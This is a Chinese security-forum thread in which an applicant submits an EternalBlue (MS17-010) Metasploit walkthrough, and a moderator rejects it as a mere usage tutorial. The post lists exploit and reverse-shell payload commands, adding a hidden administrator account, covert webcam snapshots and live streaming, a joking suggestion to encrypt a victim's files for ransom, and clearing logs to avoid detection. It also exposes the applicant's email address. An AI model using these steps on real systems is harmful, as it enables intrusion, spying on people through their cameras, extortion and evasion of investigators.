吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3392|回复: 4
收起左侧

[会员申请] 申请标题:woprrty123

[复制链接]
吾爱游客  发表于 2022-1-24 14:51
1、申 请 I D:woprrty123
2、个人邮箱:3515630142@qq.com
3、原创技术文章:原创文章


永恒之蓝漏洞利用(ms17-010)漏洞利用


一、打开kali和win7查看IP。(1)        Windows7作为靶机(2)        Kali作为攻击机(最新版kaili)官网最新版是21.4哦
二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。 image.png 三、在kali中输入 msfconsole(等待一会可能会有点慢)
四、进入后输人search ms17-010(就是之前的永恒之蓝,也就是新闻上报道的比特币勒索病毒) image.png 五、找到exploit windows/smb/ms17_010_eternalblue六、运行 use exploit/windows/smb/ms17_010_eternalblue,也可以USE 序列号哦七、输入show options 查看和配置RHOST(靶机)和LHOST(操作机) image.png 八、设置TCP连接 set payload windows/x64/meterpreter/reverse_tcp九、配置环境set rhost 192.168.1.3(win7 ip)
set lhost 192.168.1.4(kali ip) image.png 查看是否配置成功show options image.png 即为设置成功十、输入runexploit进行攻击 image.png 就这样入侵成功十一、可以创建用户 net user xxxx 1234 /addxxxx用户名 1234密码)十二、net localgroup administrators xxxx /add (将用户设置为管理员权限十一、重新打开一个终端 rdesktop+IP就进去了注意十一和十二两个命令行在meterpreter >模式下是不存在的,得拿到shell才能实现 image.png 被控端浑然不觉,很正常的在运行接下来,先用sysinfo看看被控端的信息,使用webcam_list 看看被控制的电脑有没有摄像头,routes查看路由表 image.png 这个screenshot,就是截取被控制端电脑的屏幕看看(如下图,截好的图片一般都在主目录里) image.png image.png 这个webcam_snap是打开被控制端的摄像头,拍一张图片(注意笔记本拍摄时摄像头旁边的灯会亮一下,容易被发现) image.png image.png 下面这个webcam_stream就是开启摄像头直播,把摄像头拍摄的数据流传送回来,直接直播,哈哈哈!(注意笔记本拍摄时摄像头旁边的灯会一直亮,百分百会被发现,除了瞎子之外!直到你关闭摄像头直播,按下ctrl+c即可停止,) image.png 这个就是直播呢shell,获取被控制系统的shell,就是像在你被控端电脑上运行cmd一样,啥命令都可以执行,最高权限,被控制端上没有任何的提示。可以cmd rar 把被控制端上看着有用的文件给加密压缩了,哈哈,完了留个消息,给钱给密码,不给钱,你也打不开文件,哈哈 想哭 就是这么干的…… image.png 除了上面说的这个外我们还可以用命令行让对方关机,恶搞他,前提是拿到shell后输入shutdown -s -t 时间(时间设为0是立马关机,这里数字的单位是秒)5分钟就是300秒dir下被控制端的c盘有哪些文件 image.png 能做到很多呢,上传,下载文件,执行文件 等等等 没有做不到,只有想不到(至于命令什么的我就不发了,你们自己百度)…… msf是不是很牛。(msf就是上面输入的msfconsole)
玩完了,记得清理掉痕迹,清理被控制端的日志----clearev,做到真正的神不知鬼不觉Clearev这个命令需要在meterpreter >模式下输入才有用,问题来了,我们怎么在C:\Windows\system32>模式下退到meterpreter >模式呢?其实很简单,只要按下ctrl+C即可退回至meterpreter>模式 注:Ctrl+c在kali里面是用于中止或者退出这个模式,exit是直接退出 image.png image.png


制作不易,希望官方通过
image.png

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Hmily 发表于 2022-1-25 17:15
抱歉,未能达到申请要求,申请不通过,可以关注论坛官方微信(吾爱破解论坛),等待开放注册通知。
吾爱游客  发表于 2022-1-25 19:02
Hmily 发表于 2022-1-25 17:15
抱歉,未能达到申请要求,申请不通过,可以关注论坛官方微信(吾爱破解论坛),等待开放注册通知。

这都不行,那什么样的文章才能通过,晕....
吾爱游客  发表于 2022-1-25 19:03
妈的,这都通过不了,怎样还能通过?

点评

不要说脏话,这种使用教程是不行的,申请要求都明确写了,需要技术分析文章,并达到精华优秀水平。  详情 回复 发表于 2022-1-26 17:30
Hmily 发表于 2022-1-26 17:30
游客 111.16.174.x 发表于 2022-1-25 19:03
妈的,这都通过不了,怎样还能通过?

不要说脏话,这种使用教程是不行的,申请要求都明确写了,需要技术分析文章,并达到精华优秀水平。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-14 12:29

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表